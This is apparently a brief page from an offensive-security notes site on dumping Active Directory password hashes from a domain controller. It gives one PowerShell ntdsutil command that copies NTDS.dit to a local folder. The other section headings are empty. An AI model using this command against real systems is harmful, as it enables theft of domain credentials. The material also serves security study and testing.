Dumping Domain Controller Hashes Locally and Remotely
Dumping NTDS.dit with Active Directory users hashes
No Credentials - ntdsutil
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"

No Credentials - diskshadow

With Credentials

References
PreviousDumping and Cracking mscash - Cached Domain CredentialsNextDumping Domain Controller Hashes via wmic and Vssadmin Shadow Copy
Last updated